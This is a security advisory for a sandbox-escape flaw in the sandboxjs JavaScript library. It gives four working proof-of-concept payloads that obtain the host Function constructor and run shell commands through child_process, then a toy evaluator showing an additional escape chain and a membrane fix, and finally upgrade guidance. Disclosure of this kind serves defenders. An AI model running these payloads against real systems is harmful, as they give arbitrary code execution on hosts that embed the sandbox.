CVE-2026-25520
@nyariv/sandboxjs has a Sandbox Escape issue
Description
### Summary

Function return values are not wrapped. `Object.values`/`Object.entries` on `this` return an Array containing the host's `Function` constructor, and `Array.prototype.at` (or plain indexing) then yields the host's `Function` constructor itself, which can be used to execute arbitrary code outside of the sandbox.

### Details

Function return values are not wrapped, so chaining function calls bypasses most of the sandbox's validation/sanitization: whatever a host function returns is handed back to sandboxed code as a raw host value.

### PoC

Each PoC below reaches the host `Function` constructor through a different chain and then uses it to run `ls -lah` on the host. Code compiled with the host `Function` runs in the host's global scope, where `require` is not visible, hence the use of `process.getBuiltinModule` (Node.js 22.3 / 20.16 and later); the escape itself does not depend on that API, any host API reachable from global scope would do.

```js
const s = require('@nyariv/sandboxjs').default;
const sb = new s();
// Object.values(this) returns an unwrapped Array whose first element is the
// host Function constructor; .at(0) is itself a call, so its result is not
// wrapped either.
const payload = `
console.log(
  Object.values(this).at(0)(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);
`;
sb.compile(payload)().run();
```

```js
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
// Object.entries(this)[0] is the [name, value] pair for the first entry;
// .at(1) picks the value, the host Function constructor.
const payload = `
console.log(
  Object.entries(this)[0].at(1)(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);
`;
sb.compile(payload)().run();
```

```js
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
// Iterates the [name, value] pair so no index has to be hard-coded;
// f.call('', 'return process') compiles a function returning the host
// `process` object.
const payload = `
console.log(
  Object.entries(this)
    .at(0)
    .map((f) => {
      if (typeof f === 'function') {
        f.call('', 'return process')()
          .getBuiltinModule('child_process')
          .execSync('ls -lah', { stdio: 'inherit' });
      }
    }),
);
`;
sb.compile(payload)().run();
```

```js
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
// Spreads the [name, value] pair into t.call, so `f` is the host Function
// constructor and the name becomes the (unused) `this` of t.
const payload = `
const t = (f) => {
  f.call('', 'return process')()
    .getBuiltinModule('child_process')
    .execSync('ls -lah', { stdio: 'inherit' });
};
console.log(t.call(...Object.entries(this)[0]));
`;
sb.compile(payload)().run();
```

### Impact

Sandbox escape leading to arbitrary code execution on the host (RCE): code passed to the sandbox runs with the privileges of the Node.js process that embeds it.
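The Summary and Details above describe a bug class (validation applied to property access, but not to the values a function call returns) that is easiest to see in a self-contained model. The following is an added illustration written for this page in plain Node.js, not code from @nyariv/sandboxjs: a toy expression evaluator over a hand-built AST that exposes a host scope object, refuses dangerous names on member access, and optionally wraps every value handed back to sandboxed code in a Proxy membrane. The AST shape, the scope contents (the host `Function` stored under a name the evaluator refuses to read directly, as the advisory reports for `this`), and the two blocklists are assumptions for the demonstration. It also goes one step beyond the advisory's payload: the second payload reaches the host `Function` from any host function in scope via `Object.getOwnPropertyDescriptor(...).value`, because `'constructor'` arrives as a string argument that a member-access name check never sees.

```javascript
// Added illustration, not code from @nyariv/sandboxjs: a toy evaluator that
// exposes a host "scope" object to untrusted expressions and vets member
// access by NAME, but (when wrapReturns is false) hands function return
// values back unchecked, the bug class behind CVE-2026-25520.
// The AST shape, scope contents and blocklists are assumed for the demo.

const BLOCKED_PROPS = new Set(['constructor', '__proto__', 'prototype', 'Function', 'eval']);
// Host primitives that compile code; a membrane must refuse to ever hand these out.
const BLOCKED_VALUES = new Set([
  Function, eval,
  Object.getPrototypeOf(function* () {}).constructor,
  Object.getPrototypeOf(async function () {}).constructor,
  Object.getPrototypeOf(async function* () {}).constructor,
]);

// Tiny AST builders: identifier, literal, member access, call.
const id = (name) => ({ t: 'id', name });
const lit = (v) => ({ t: 'lit', v });
const m = (obj, prop) => ({ t: 'member', obj, prop });
const c = (callee, ...args) => ({ t: 'call', callee, args });

function makeEvaluator({ scope, wrapReturns }) {
  const proxies = new WeakSet();
  const cache = new WeakMap();

  // Membrane: every object/function that reaches sandbox code is a Proxy, so
  // property reads and calls on it are vetted, and what they return is wrapped too.
  function wrap(v) {
    if (v === null || (typeof v !== 'object' && typeof v !== 'function')) return v;
    if (proxies.has(v)) return v;
    if (BLOCKED_VALUES.has(v)) throw new Error('blocked: host code-compiling function');
    if (cache.has(v)) return cache.get(v);
    const p = new Proxy(v, {
      get: (target, prop) => readProp(target, prop),
      apply: (target, thisArg, args) => wrap(Reflect.apply(target, thisArg, args)),
      construct: () => { throw new Error('blocked: construct'); },
    });
    proxies.add(p);
    cache.set(v, p);
    return p;
  }

  function readProp(obj, prop) {
    if (BLOCKED_PROPS.has(prop)) throw new Error(`blocked: property ${String(prop)}`);
    const v = obj[prop];
    return wrapReturns ? wrap(v) : v;
  }

  function evaluate(node) {
    switch (node.t) {
      case 'lit': return node.v;
      case 'id':
        if (node.name === 'this') return wrapReturns ? wrap(scope) : scope;
        return readProp(scope, node.name);
      case 'member': return readProp(evaluate(node.obj), node.prop);
      case 'call': {
        const isMethod = node.callee.t === 'member';
        const thisArg = isMethod ? evaluate(node.callee.obj) : undefined;
        const fn = isMethod ? readProp(thisArg, node.callee.prop) : evaluate(node.callee);
        const result = Reflect.apply(fn, thisArg, node.args.map(evaluate));
        // The bug: without wrapping, a raw host value (an Array, a property
        // descriptor, even Function itself) flows back into sandbox code unvetted.
        return wrapReturns ? wrap(result) : result;
      }
      default: throw new Error(`unknown node ${node.t}`);
    }
  }
  return evaluate;
}

// Run an expression and report either its value or the blocking error.
function runInSandbox(ast, wrapReturns) {
  // Assumed scope: the host Function is present but its name is on the
  // blocklist, as the advisory reports for `this`; Math is a harmless extra.
  const scope = { Function, Object, Math };
  try {
    return { ok: true, value: makeEvaluator({ scope, wrapReturns })(ast) };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}

// The advisory's chain:  Object.values(this).at(0)
const PAYLOAD_VALUES_AT = c(m(c(m(id('Object'), 'values'), id('this')), 'at'), lit(0));
// Same bug class with no Function in scope at all; 'constructor' is data, not a
// member name:  Object.getOwnPropertyDescriptor(Object.getPrototypeOf(Math.max), 'constructor').value
const PAYLOAD_DESCRIPTOR = m(
  c(m(id('Object'), 'getOwnPropertyDescriptor'),
    c(m(id('Object'), 'getPrototypeOf'), m(id('Math'), 'max')), lit('constructor')),
  'value');
// Direct read, refused by the name check in both modes:  this.Function
const PAYLOAD_DIRECT = m(id('this'), 'Function');

for (const [name, ast] of Object.entries({ PAYLOAD_VALUES_AT, PAYLOAD_DESCRIPTOR, PAYLOAD_DIRECT })) {
  const show = (r) => (r.ok ? (r.value === Function ? 'host Function leaked' : String(r.value)) : `blocked (${r.error})`);
  console.log(`${name}: unwrapped -> ${show(runInSandbox(ast, false))}; wrapped -> ${show(runInSandbox(ast, true))}`);
}
```

Run it with `node`: the unwrapped evaluator leaks the host `Function` for both payloads while the direct `this.Function` read is refused in both modes, which is exactly the shape the advisory reports. The membrane closes the hole by applying policy to values (`BLOCKED_VALUES`) and not only to names, and by wrapping whatever `get` and `apply` return. A production membrane additionally has to respect Proxy invariants for non-configurable properties and cover getters, `Reflect`, and the prototype-chain traps, which this toy leaves out.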
How to fix CVE-2026-25520
To remediate CVE-2026-25520, upgrade the affected package to a fixed version below. After upgrading, re-run the PoCs from the description against the new version and confirm they no longer execute the shell command.
- @nyariv/sandboxjs: upgrade to 0.8.29 or later
Is CVE-2026-25520 being exploited?
Low. The EPSS score is 0.1%, an estimate that exploitation in the wild is unlikely within the next 30 days, not a measurement of observed exploitation. Working PoCs are public (see the description above), so read the score as low likelihood, not low impact: wherever the sandbox evaluates untrusted input, the upgrade should not wait.